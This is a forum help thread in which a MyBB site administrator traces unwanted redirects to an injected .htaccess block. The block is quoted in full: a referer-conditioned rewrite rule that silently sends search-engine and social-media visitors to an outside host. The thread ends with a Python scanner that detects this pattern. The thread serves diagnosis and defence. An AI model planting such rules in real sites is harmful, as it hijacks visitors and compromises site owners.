MyBB Community Forums

Full Version: whatever you press an 'ok' message appears.
Follow this guidance: http://community.mybb.com/thread-110890.html
Not all steps are required (in your case you have to go through the whole 2 and maybe 1), but I recommend reading everything carefully.
Also check if you use any vulnerable plugins and uninstall/update them: http://community.mybb.com/thread-133659.html
Hello all, thanks for the help,

I'm the administrator for the site and I have:

1. disabled all plugins - nothing
2. searched for that screwattack url link in all of my forum files w/ notepad++ and found nothing
3. found no strange lines in code
4. I did file verification check and it said almost all of the files were modified...

The most recent thing I did was a month ago, when I updated MyBB from 1.6.6 to 1.6.10, and it seemed to have worked fine since then.

I am wondering if I have to see if they injected or modified code in the database side of mybb?

edit: also where do I find the header and footer?

Thanks

Upon further searching I found the offending file:

It's the .htaccess file under the main www directory.

Here are its contents:
Quote:
#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://screwaholic.com/savas_mazlum/count.php [R=301,L]
</IfModule>

#/0c0896#

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Any ideas on how they were able to edit this file to have the malicious redirects?

Thanks for all the help!
Any ideas? So we can be aware of this?

Thanks.
^ server log should have the clue(s)
Okay thanks in advance!
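A way to check other `.htaccess` files for the same pattern as the block quoted in this thread (a `RewriteCond` on `HTTP_REFERER` followed by a `RewriteRule` that points to an external host, wrapped in paired `#xxxxxx#` / `#/xxxxxx#` marker comments). This is an added example, not code from the thread; the function name, the `own_hosts` parameter, the shortened referer list and the `redirect.example.invalid` host are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Paired marker comments like "#0c0896#" ... "#/0c0896#" (format taken from the quoted file).
MARKER = re.compile(r"^#(/?)([0-9a-f]{6})#$", re.I)
REFERER_COND = re.compile(r"^RewriteCond\s+%\{HTTP_REFERER\}\s", re.I)
RULE = re.compile(r"^RewriteRule\s+\S+\s+(\S+)", re.I)

def scan_htaccess(text, own_hosts=()):
    """Return sorted (line_no, kind, detail) findings for one .htaccess body."""
    findings, open_markers, referer_line = [], {}, None
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        marker = MARKER.match(line)
        if marker:
            closing, tag = marker.group(1), marker.group(2).lower()
            if not closing:
                open_markers[tag] = no
            elif tag in open_markers:
                findings.append((open_markers.pop(tag), "marker-pair",
                                 f"#{tag}# closed on line {no}"))
        elif REFERER_COND.match(line):
            referer_line = no
        else:
            rule = RULE.match(line)
            if rule:
                # Only absolute URLs have a hostname; "-" and "/index.php" do not.
                host = urlparse(rule.group(1)).hostname
                if referer_line and host and host not in own_hosts:
                    findings.append((no, "referer-redirect",
                                     f"{host} (condition on line {referer_line})"))
                referer_line = None  # conditions apply only to the next RewriteRule
    return sorted(findings)

# Constructed sample: same shape as the quoted file, placeholder host, short referer list.
SAMPLE = r"""#0c0896#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|bing|yahoo)\.(.*)
RewriteRule ^(.*)$ http://redirect.example.invalid/count.php [R=301,L]
</IfModule>

#/0c0896#
# BEGIN WordPress
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
# END WordPress
"""

if __name__ == "__main__":
    for finding in scan_htaccess(SAMPLE):
        print(finding)
```

Because the redirect only fires for visitors arriving from a search engine or social site, browsing to the forum directly will not reproduce it, which is why scanning the file itself is more reliable than testing in a browser.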